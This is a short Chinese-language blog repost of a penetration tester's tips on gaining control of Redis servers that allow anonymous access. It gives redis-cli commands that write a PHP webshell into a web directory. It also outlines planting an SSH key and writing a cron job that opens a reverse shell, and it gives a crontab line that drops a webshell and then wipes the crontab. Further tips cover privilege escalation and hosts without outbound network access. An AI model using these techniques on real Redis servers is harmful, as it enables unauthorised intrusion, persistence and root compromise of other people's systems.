IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
  • 登录 注册

    科普:Redis 匿名访问利用技巧

    91Ri管理团队发表于 2016-11-04 02:40:09
    love 0

    Redis 数据库在内网渗透中比较常见,结合近期的利用过程,记录下:

    在内网机器中下载Redis 解压 make一下,不用make install

    A) 一般情况下知道路径写shell

    ./redis-cli -h IP
     
    config set dir /home/wwwroot/default/
     
    config set dbfilename redis.php
     
    set webshell "<?php phpinfo(); ?>"
     
    save

    参考 https://www.secpulse.com/archives/5357.html

    B) 利用公匙免密码登录
    1 本机生成公匙
    2 利用redis将公匙备份到redis机器上
    参考 https://www.secpulse.com/archives/40406.html

    C) 利用linux的任务反弹shell

    1 /var/spool/cron linux机器下默认的计划任务,开启cron的时候,linux会定时去执行里面的任务,文件名为用户名
    2 redis 设置dbfilename 到上面可以直接反弹shell回来

    参考 https://www.secpulse.com/archives/49962.html

    大概总结了主要是以上三种方式获取redis服务器的权限,因为redis一般都是root权限启动的,所以权限很大。

    但渗透过程中总是会出现意向不到的情况,有木有啊。

    第一种方式,如果redis数据库太大,导致php马超限,直接500不解析,那我们可以通过第三个命令写个马到web目录

    */1 * * * *  echo "<?php phpinofo();?>" >/var/www/html/90sec.php;crontab -r

    这样的马就没问题了

    第二种方式,我测试本机没问题,但是到了渗透环境就出问题了,应该是ssh免密码登录 .ssh目录权限问题,成功几率不太大

    第三种方式,最喜欢的一种,简单粗暴明了,连提权都省了(如果是重要的机器,root用户一般都会有计划任务,建议先用低权限的用户反弹个shell上去 探下情况,在root) 但也遇到很奇葩的不给连接外网的机器,那就只能写个shell到web目录,或者在内网监听一个bashshell ,自己去连接就ok了

    redis还有一个发现就是,高版本的linux提权不了,我们也可以通过redis直接提权,也就是第三方软件提权的一种方法吧。

    【via@90sec-80uncle】 本文系授权转载,未经授权请勿转载本文。



沪ICP备19023445号-2号
友情链接